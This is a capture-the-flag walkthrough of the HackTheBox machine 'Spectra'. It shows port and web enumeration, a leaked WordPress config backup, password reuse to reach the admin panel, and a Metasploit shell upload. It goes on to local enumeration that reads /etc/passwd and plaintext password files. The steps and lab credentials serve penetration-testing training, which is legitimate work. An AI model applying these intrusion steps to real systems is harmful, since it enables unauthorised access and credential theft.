Join Our Membership To Start Your Cybersecurity Journey Today!

Spectra

Spectra is an easy level box that is beginner friendly with assigned IP of 10.10.10.229. We will hack into it through a wordpress website and upload a shell. Then we use init deamon which can be run as sudo and escalate the privileges.

nmap Scan

First of all, run nmap scan with the following command

nmap -sC -sV -T4 -A -oA nmap_scan 10.10.10.229

So from nmap scan, we get following open ports with services

22 – OpenSSH v8.1
80 – http (nginx 1.17.4)
3306 – mysql
8081 – blackice-icecap

First we check website running on port 80

Upon hovering over the links, it shows link to spectra.htb. So we add an entry for spectra.htb against 10.10.10.229 in /etc/hosts.

Now open both links to see what both have

Meanwhile we run nikto for scanning web server for possible vulnerabilities

Also we run gobuster with seclists wordlist common.txt to fuzz directory and it found 2 directories

Both of the directories found are already in the main page of website in href links

Software Issue Tracker

It redirected to a wordpress website as follows

Blackice icecap was running on port 8081. Upon navigating to it, simple hello world was found.

Looks like it’s just a rabit hole so we leave it and move to Software Issue Tracker

Before exploring it, we run wpscan on it

wpscan

Through wpscan, it was found that xmlrpc is enabled. So we can try bruteforcing username and password using wpscan again

First enumerate the username using wpscan

We found that administrator is the correct user by confirming through login page

Now we will bruteforce the password using burp intruder but it took too much time.

So meanwhile check the other link from main page leading to http://spectra.htb/testing/index.php

Here we got db connection error. But from nikto scan, we know directory listing on /testing is enabled

There’s an interesting file found named wp-config.php but going to that file all it showed was the same db connection error page

Below that is wp-config.php.save file but going to that file it was all empty. Used curl to check if we find anything interesting and we got the configurations as follows

Database

Here we got database credentials. So trying these credentials with multiple ways, all it responded was that our host is not allowed to connect

Let’s try these credentials at wp-login because most of the times developers use the same passwords everywhere

Access to wp-admin

With devtest:devteam01 it gave unknown username. But from enumeration, we know an existing user administrator So trying that with the same password devteam01 we got logged in

So now we have admin access to wordpress dashboard.

First see what other users we have by going to users in navigation panel

We only have administator user with the following details

We got the following information

Username: administrator
email: devteam@megabank.local
website: http://10.10.10.90/sites/dev (rabbit hole because 10.10.10.90 isn’t in the scope and we also don’t have access to that IP)

Exploitation through Metasploit

So now we have got admin credentials, we can search for exploits in metasploit

Searching for wordpress admin keywords we got following results

At number 2 we have wordpress admin shell upload exploit. So we use this exploit to gain access as shown below

Following are the options set up

Running the exploit, we got the meterpreter session opened (the exploit worked 😉)

Shell

Get out of meterpreter shell and open machine’s own shell using shell command and then displaying the bash shell using following command

python3 -c "import pty;pty.spawn('/bin/bash')"

Spawning bash shell gave python error, but trying the same command in /tmp worked

Also running clear command gave TERM variable not set error. So export it using following command

export TERM=xterm

Now cat /etc/passwd file and see the existing users

Following are the users with a login shell

root:x:0:0:root:/root:/bin/bash
chronos:x:1000:1000:system_user:/home/chronos/user:/bin/bash
nginx:x:20155:20156::/home/nginx:/bin/bash
katie:x:20156:20157::/home/katie:/bin/bash

We are currently nginx user. Let’s try to go to katie as this seems the potential user account

We got user.txt but can only be accessed by katie

Local Enumeration

Let’s try running linpeas.sh Running directly the executable gives permission error. Try running with bash linpeas.sh

On the shell it won’t show the scroll-up history so use the following command to save the colorful output to a file and then start python http server to wget the file in local system and go through the file thoroughly

bash [linpeas.sh](<http://linpeas.sh>) | tee -a "result"

Going through the linpeas result, I came across an interesting path related to main site’s wp_config file as follows

Upon seeing the contents of this file, we got creds of mysql as dev:development01

Upon successful login I was able to retrieve the wp_users table as follows

Let’s check out /opt folder

Here an interesting file exists named autologin.conf.orig

Following are the contents of the file

It looks like there’s an autologin script that reads the password from a file and injects into the login shell at boot

The path to password file is /etc/autologin

Here we can see we have got the password SummerHereWeCome!! But we don’t know whose password is this. Let’s try on all 2 other non-root users one by one. But switch user command su doesn’t seem to work.